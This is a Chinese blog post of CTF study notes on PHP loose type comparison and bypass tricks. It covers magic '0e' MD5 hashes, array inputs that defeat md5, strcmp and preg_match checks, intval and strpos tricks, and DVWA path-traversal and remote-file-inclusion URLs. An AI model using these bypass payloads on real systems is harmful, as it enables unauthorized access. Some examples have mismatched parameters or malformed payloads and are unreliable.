php弱类型比较及绕过

已于 2023-01-03 19:32:39 修改
阅读量2.7k 收藏 46
点赞数 7
分类专栏: 网络安全学习笔记 文章标签: php 开发语言 数据库
于 2022-11-22 15:22:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45349299/article/details/127983551
版权

title: php弱类型比较以及绕过
date: 2022-11-20 12 :14 :36
tags: php
categories: 学习笔记
author: Abyssaler

PHP中的弱类型比较

php是一种弱类型语言,对数据的类型要求并不严格,可以让数据类型互相转换

0.强类型与弱类型

强类型

•所谓强类型(Strongly typed),顾名思义就是强制数据类型定义的语言。也就是说,一旦一个变量被指定了某个数据类型,如果不经过强制转换,那么它就永远是这个数据类型。J

•ava、.NET、C++等都是强类型语言,在变量使用之前必须声明变量的类型和名称;且不经强制转换不允许两种不同类型的变量互相操作。

弱类型

•对数据的类型要求并不严格,可以让数据类型互相转换。

1.== 和 ===的区别

php中其中两种比较符号:

==:先将字符串类型转化成相同,再比较
===:先判断两种字符串的类型是否相等,再比较

PHP转换规则

字符串和数字比较使用==时,字符串会先转换为数字类型再比较,若字符串以数字开头,则取开头数字作为转换结果,不能转换为数字的字符串(例如"aaa"是不能转换为数字的字符串,而"123"或"123aa"就是可以转换为数字的字符串)或null,则转换为0;例如

 var_dump(12=="12")                                 //true
 var_dump(12=="12aa")                               //true
 var_dump( "admin"==0)							    //true
 var_dump(false==""==0==NULL)						//true

例子2:

var_dump('a' == 0);	    //bool(true)
var_dump('1a' == 1);	//bool(true)
var_dump('12a' == 1);	//bool(false)

会出现上面的结果是因为字符串在和数字比较的时候会将字符串转化为数字,比如a转换失败成False,False又和0弱类型比较是相等的,所以第一个是true。

但是如果字符串是以数字开头的,那么就会转成这个数字再做比较,所以第二个也是true,第三个则是因为转成数字后变成了12,不等于1,则为false。

2.布尔型和任意比较

布尔值true和任意字符串都弱相等,除了0和false,因为0也认为是bool false,true是不等于false的,例如:

var_dump(true=="hyuf")                   //true
var_dump(True == 0);	                 //bool(false)
var_dump(True == 'False');	             //bool(true)
var_dump(True == 2);	                 //bool(true)

3.hash值和字符串“0”比较

$str1 = "a";
echo md5($str1);	//0cc175b9c0f1b6a831c399e269772661
var_dump(md5($str1) == '0');	//bool(false)
---------------------------------------------------------
$str2 = "s224534898e";
echo md5($str2);	//0e420233178946742799316739797882
var_dump(md5($str2) == '0');	//bool(true)
---------------------------------------------------------
$str3 = 'a1b2edaced';
echo md5($str3);	//0e45ea817f33691a3dd1f46af81166c4bool
var_dump(md5($str3) == '0');	//bool(false)
---------------------------------------------------------
var_dump('0e111111111111' == '0');	//bool(true)
  • 其实我觉得这个不应该叫做hash值和字符串0的比较,应该叫做科学计数法和字符串和0的比较,只要是以0e开头,后面为数字的字符串和字符串0比较值都是相等的,因为不管0不论和多少相乘都是0
  • 所以当hash出来的32个值,开头前两个为0e,后面全部为数字的话,他们就会和字符串0相等的。
  • 第一条只是0开头,所以只能当普通字符串,结果为false。
  • 第二条0e后面全为数字,符合要求,结果为true。
  • 第三条虽然为0e,但是后面不全为数字,所以结果为false。
  • 最后一条就是告诉大家,不是只有hash才能和字符串0相等。
  • 数字和“e"开头加上数字的字符串(例如"1e123”)会当作科学计数法去比较;
  • 当字符串被当作一个数值来处理时,如果该字符串没有包含’.’,‘e’,'E’并且其数值在整形的范围之内,该字符串作为int来取值,其他所有情况下都被作为float来取值,并且字符串开始部分决定它的取值,开始部分为数字,则其值就是开始的数字,否则,其值为0。

4.Strcmp函数的漏洞

strcmp()用法如下

image-20221120125019731

有一些细节需要注意下

strcmp(s1,s2)
说明:

当s1<s2时,返回为负数 注意不一定是-1,测试结果是比较字符串长度
当s1==s2时,返回值= 0
当s1>s2时,返回正数 注意不一定是1,测试结果是比较字符串长度
如果两个字符串不同等,但是字符串长度相同,就比较从哪一位开始不同的,然后比较那一位的大小。

即:两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇'\0'为止。如:
"A"<"B" "a">"A" "computer">"compare"

特别注意:strcmp(const char *s1,const char * s2)这里面只能比较字符串,不能比较数字等其他形式的参数,如果出现了其它参数,则会retrun null,有些题目就是利用这一点来进行和0的完成比较。

不过测试的结果是只有数组的时候才会出现这个问题,数字不会,和网上的资料有点出入。

<?php
$test = 8;
if (strcmp($test,"test")){
	echo "ok!";
	echo "\n";
	echo strcmp($test,"test");
	}
else 
	echo "oh no!"
?>


运行结果

ok!
-1

传入的是数字,返回的是-1而不是0,但传入数组就不一样了。

<?php
$test = array();
$test[0]=1;
print_r($test);

if (strcmp($test,"test")){
	echo "ok!";
	echo "\n";
	echo strcmp($test,"test");
	}
else 
	echo "oh no!"
?>

运行结果

Array
(
    [0] => 1
)
oh no!
PHP Warning:  strcmp() expects parameter 1 to be string, array given in /box/main.php on line 6

各种绕过

1.switch绕过

image-20221120125323159

具体原理参考站内:

https://abyssaler.github.io/post/ctf%E4%B9%8Bwake_php

2.==绕过

PHP比较运算符 ==在进行比较的时候是弱类型比较,只需要比较两个值相等就行,不会比较类型

绕过方法如:1=1.0,1=+1

$a=1;

if($a==$_GET['x']){
    echo $flag;

}

//使用1.0就可以绕过 

if($_GET['name'] != $_GET['password']){
    if(MD5($_GET['name']) == MD5($_GET['password'])){
        echo $flag;

    }

    echo '?';

}

//MD5('QNKCDZO')==MD5('240610708')

//echo MD5('QNKCDZO');

//echo MD5('240610708');

PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0

3.===绕过

PHP比较运算符 ===在进行比较的时候,会先判断两种字符串的类型是否相等,再比较值是否相等。只要两边字符串类型不同会返回false

绕过方法:使用数组绕过

if($_GET['name'] != $_GET['password']){
    if(MD5($_GET['name']) == MD5($_GET['password'])){
        echo $flag;

    }

    echo '?';

}

//name[]=1&password[]=2

PHPmd5()函数无法处理数组(会返回NULL==的也可以用数组绕过

4.intval()函数

intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1(注意这个通常配合preg_match来使用)

语法
int intval ( mixed $var [, int $base = 10 ] )
参数说明:

$var:要转换成 integer 的数量值。
$base:转化所使用的进制。

如果 base为空,通过检测 var 的格式来决定使用的进制:

如果字符串包括了 "0x" ("0X") 的前缀,使用 16 进制 (hex);
否则,如果字符串以 "0" 开始,使用 8 进制(octal);
否则,将使用 10 进制 (decimal)

绕过方法:通过使用0x或者0开始的格式来绕过不相等的判断(像一些要先判断不相等再判断相等的题目)

$i='666';

$ii=$_GET['n'];

if(intval($ii==$i,0 )){
    echo $flag;

}

//n=0x29a   666的二进制是29a

通过检测 $ii的格式来决定使用的进制

5.strpos()函数

strpos() 函数查找字符串在另一字符串中第一次出现的位置(区分大小写)。(函数返回查找到这个find字符串的位置,那么如果是0位置,就值得注意了)

注释:strpos() 函数是区分大小写的。

strpos(string,find,start)

参数		描述
string	必需。规定被搜索的字符串。
find	必需。规定要查找的字符。
start	可选。规定开始搜索的位置

绕过方法:利用换行进行绕过(%0a)

$i='666';

$ii=$_GET['h'];

if(strpos($ii,$i,"0")){
    echo $flag;

}

//?num=%0a666

6.in_array()函数

in_array() 函数搜索数组中是否存在指定的值。

bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] )
参数			描述
needle		必需。规定要在数组搜索的值。
haystack	必需。规定要搜索的数组。
strict		可选。如果该参数设置为 TRUE,则 in_array() 函数检查搜索的数据与数组的值的类型是否相同。

问题就出在第三个参数,如果第三个参数不设置为true就不检测类型,是弱比较,相当于==号

绕过方法:与==一样

$whitelist = [1,2,3];

$page=$_GET['i'];

if (in_array($page, $whitelist)) {
    echo "yes";

}

//?i=1ex

7.preg_match()函数

preg_match 函数用于执行一个正则表达式匹配。

详细用法可以参考:https://www.runoob.com/php/php-preg_match.html

绕过方法:preg_match只能处理字符串,如果不按规定传一个字符串,通常是传一个数组进去,这样就会报错,如果正则不匹配多行(/m)也可用上面的换行方法绕过

if(isset($_GET['num'])){
    $num = $_GET['num'];

    if(preg_match("/[0-9]/", $num)){[t1] 

        die("no no no!");

    }

    if(intval($num)){
        echo $flag;

    }

}

//?num[]=1

上面介绍过了,intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1

8.str_replace函数

str_replace() 函数用于替换字符串中指定字符(区分大小写)

<?php
echo str_replace("world","Peter","Hello world!");
?>

//输出:Hello Peter!

str_replace(find,replace,string,count)

参数		描述
find	必需。规定要查找的值。
replace	必需。规定替换 find 中的值的值。
string	必需。规定被搜索的字符串。
count	可选。一个变量,对替换数进行计数。

绕过方法:str_replace无法迭代过滤 ,可以通过双写绕过

例如:例如page=hthttp://tp://192.168.0.103/phpinfo.txt时,str_replace函数会将http://删除,于是page=http://192.168.0.103/phpinfo.txt,成功执行远程命令。

三个实例:

1、本地文件包含
http://192.168.0.103/dvwa/vulnerabilities/fi/page=…/./…/./…/./…/./…/./…/./…/./…/./…/./…/./xampp/htdocs/dvwa/php.ini
2、绝对路径不受任何影响
http://192.168.0.103/dvwa/vulnerabilities/fi/page=C:/xampp/htdocs/dvwa/php.ini
3、远程文件包含
http://192.168.0.103/dvwa/vulnerabilities/fi/page=htthttp://p://192.168.5.12/phpinfo.txt

9.json绕过

<?php
if (isset($_POST['message'])) {
    $message = json_decode($_POST['message']);
    $key ="*********";
    if ($message->key ==$key ) {
        echo "flag";
    } 
    else {
        echo "fail";
    }
 }
 else{
     echo "~~~~";
 }
?>

输入一个json类型的字符串,json_decode函数解密成一个数组,判断数组中key的值是否等于
k e y 的值,但是 key的值,但是 key的值,但是key的值我们不知道

这时我们构造一个和任意字符串返回为真的数组{“key”:true}。即可绕过

payload=message={“key”,true}

10.array_search的漏洞

array_search() 函数与 in_array() 一样,在数组中查找一个键值。如果找到了该值,匹配元素的键名会被返回。如果没找到,则返回
false。

<?php
$a=array(1,4);
var_dump(array_search("4admin",$a)); // int(0)=> 返回键值1
var_dump(array_search("1admin",$a)); // int(1) ==>返回键值0
?>//这个和之前的类型转换类似,但是如果是array_search(“4admin”,$a,true),最后的“true”会禁止类型转换。

这个和之前的类型转换类似,但是如果是array_search(“4admin”,$a,true),最后的“true”会禁止类型转换

部分内容引用自:

https://zhuanlan.zhihu.com/p/30323499

https://blog.csdn.net/u014029795/article/details/99709333

https://www.csdn.net/tags/MtTaMg2sNTc4NDM0LWJsb2cO0O0O.html

Abyssaler
关注
  • 7
    点赞
  • 46
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP代码审计(含详细文件目录)
04-05
目录 01 extract变量覆盖.php 02 绕过过滤的空白字符.php 03 多重加密.php 04 SQL注入_WITH ROLLUP绕过.php ...22 类型整数大小比较绕过.php 23 md5函数验证绕过.php 24 md5函数true绕过注入.php
PHP特性(网友根据ctfshow整理)1
08-03
PHP支持类型,这意味着在进行比较时,不同类型的数据可以被自动转换成相同类型。例如,字符串"123"与整数123使用`==`比较时,它们被视为相等。这种特性可能导致预期之外的结果,特别是在涉及数据验证和安全的场景...
【踩坑系列】strpos() expects parameter 1 to be string, int given
热门推荐
NDSC_L的博客
12-15 1万+
如图:意思是参数错误 一个非常愚蠢的错误,解决方法如下 修改为:
PHP类型
weixin_45007073的博客
02-10 348
PHP的变量类型 标准类型:布尔boolen、整型integer、浮点float、字符string 复杂类型:数组array、对象object 特殊类型:资源resource 操作之间的比较及代码展示 字符串和数字比较 数字和数组比较 字符串和数组比较 "合法数字+e+合法数字"类型的字符串 == 和===,两个等号比较类型是否相同,三个等号在这基础上再比较值是否相等 <?php var_dump(0=="admin"); var_dump("1admin"==1);
php饶过的强比较
最新发布
ph51342的博客
05-19 331
3、字符型和数字型比较,若字符开头为数字,则转换为数字,若开头不为数字,则为null与0相等。因为md5(a[]=1)和md5(b[]=1)的值都为空,所以两个等于就为true。md5不能加密数组,a[]=1,b[]=1,传入数组会报错,执行的话会返回空。a === b先判断a,b类型,若相同,则比较值,若不同,就返回false。使用三个等于比较,“===”,比较值,也比较类型。使用两个等于作比较,“==”,只比较值,不比较类型。1、字符和字符作比较,同类型比较内容。a==b先将值转换为同类型再做比较
PHP入门】三、数据类型比较
weixin_45720193的博客
10-04 262
例如,“42” 是一个字符串而 42 是一个整数。,但也需要明白变量类型及它们的意义,因为我们经常需要对 PHP 变量进行比较,包含松散和严格比较。此函数返回一个字符串,用于表示传递给它的 resource 的类型。以下实例演示了在函数内使用常量,即便常量定义在函数外也可以正常使用常量。PHP 变量存储不同的类型的数据,不同的数据类型可以做不一样的事情。在以下实例中我们将测试不同的数字。常量是一个简单值的标识符。所以,常量是在定义的该范围内才有效的。在以下实例中我们将测试不同的数字。
php 操作系统之间的一些黑魔法(绕过文件上传a.php/.)
3569
01-02 7672
http://wonderkun.cc/index.html/?p=6260x00 前言做了一个CTF题目,遇到了一些有趣的东西,所以写了这篇文章记录了一下。 但是我却不明白造成这个问题的原因在哪里,所以不知道给文章起什么标题,就姑且叫这个非常宽泛的名字吧。0x01 CTF题目原型在遇到的题目中,最后一步是getshell,大概可以简化为以下代码: // 测试环境 linux + apache2
CTF中常见的php函数绕过(保持更新)
csu_vc的博客
11-03 1万+
is_numeric()用于判断是否是数字,通常配合数值判断is_numeric(@$a["param1"])?exit:NULL; if(@$a["param1"]){ ($a["param1"]>2017)?$v1=1:NULL; } //param1不能是数字,但又要比2017大,利用数组$pos = array_search("nudt",$a["param2"]); $pos ==
php代码审计基础补习第二课
05-25
这门“php代码审计基础补习第二课”旨在深化我们对这个主题的理解,特别是关注漏洞挖掘、代码分析、注入攻击、上传漏洞以及权限绕过等关键概念。 首先,我们要明白代码审计是预防和发现潜在安全问题的过程。在PHP...
phpweb的文件破解并修复万能密码漏洞
06-23
1. **限制文件类型**:只允许特定类型的文件上传,如图片或文档。 2. **重命名上传文件**:上传后立即为文件生成随机名称,避免攻击者根据已知名称访问文件。 3. **文件上传目录不可执行**:确保文件上传目录无执行...
HDwiki-sql注入1
08-03
攻击者可以利用PHP类型系统,通过精心设计的字符串(如 `2l1nk3r`,它会被解析为数字2,然后是字符串`l1nk3r`)来绕过类型检查,进一步执行恶意操作。 在`hdwiki/model/hdwiki.class.php` 文件的 `...
php中的比较,php中的比较运算符详解
weixin_42348109的博客
03-09 222
如果比较一个整数和字符串,则字符串会被转换为整数。如果比较两个数字字符串,则作为整数比较。此规则也适用于 switch 语句1、对于数组$a=array(1,2,3,6);$b=array(1,2,3,6,8);echo "\n";var_dump( $a>$b);var_dump( $a==$b);var_dump( $a结果:boolean falseboolean falseboole...
判断与比较PHP的版本
hsd2012的专栏
05-21 3303
判断与比较PHP的版本
php绕过md5检验
sinat_41380394的博客
08-21 2260
&lt;?php if(isset($_GET['v1']) &amp;&amp; isset($_GET['v2']) &amp;&amp; isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 &amp;&amp; md5($v1)...
php-类型的小陷阱
点滴
01-05 1381
今天群里讨论的一个问题,记录一下。 问题起源是 var_dump(md5('240610708') == md5('QNKCDZO')); //true 两个md5的字符串,用比较运算符(==)比较出来居然是相等的。 输出一下两个的值 分别是: md5('240610708') //0e462097431906509019562988736854 md5('QNK
PHP 比较运算符
subarashiigyoku的博客
07-19 860
比较运算符,如同它们名称所暗示的,允许对两个值进行比较。还可以参考 PHP 类型比较表看不同类型相互比较的例子。 比较运算符 例子 名称 结果 $a == $b 等于 TRUE,如果类型转换后 $a 等于 $b。 $a === $b 全等 TRUE,如果 $a 等于 $b,并且它们的类型也相同。 $a != $b 不等 TRUE,如果...
php绕过漏洞的函数,PHP中有漏洞的函数总结
weixin_30670053的博客
04-06 658
本篇文章讲述了PHP中存在这一些带有小漏洞的PHP函数,没有了解过PHP中有漏洞函数的可以看看,在实际的PHP开发中用到这些函数时需要注意哪些东西,我们废话少说,一起来看看这篇文章吧!1.类型比较2.MD5 compare漏洞PHP在处理哈希字符串时,如果利用”!=”或”==”来对哈希值进行比较,它把每一个以”0x”开头的哈希值都解释为科学计数法0的多少次方(为0),所以如果两个不同的密码经过哈...
PHP类型比较总结
baynk的博客
08-19 3912
这个用来记录总结碰到的php类型比较,持续更新。 0x01 字符串和数字比较 var_dump('a' == 0); //bool(true) var_dump('1a' == 1); //bool(true) var_dump('12a' == 1); //bool(false) 会出现上面的结果是因为字符串在和数字比较的时候会将字符串转化为数字,比如a转换失败成False,False又和0...
PHP代码执行绕过姿势 无数字字母类型
qq_45691294的博客
10-31 3242
问题引导 <?php highlight_file(__FILE__); header("Content-type:text/html;charset=utf-8"); error_reporting(0); if(preg_match('/[a-z0-9]/is',$_GET['shell'])){ echo "hacker!!!"; }else{ eval($_GET['shell']); } 看到上面的代码,很明显是一道代码执行的题目,但是利用难点在对输入参数进行了正则匹配,过
什么是php类型比较,具体案例
05-25
PHP类型比较是指在比较两个变量时,不会进行类型的强制转换,而是直接使用变量的原始类型进行比较。具体案例可以举一个简单的例子: ``` $a = 0; $b = "0"; if($a == $b){ echo "相等"; } else { echo "不...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值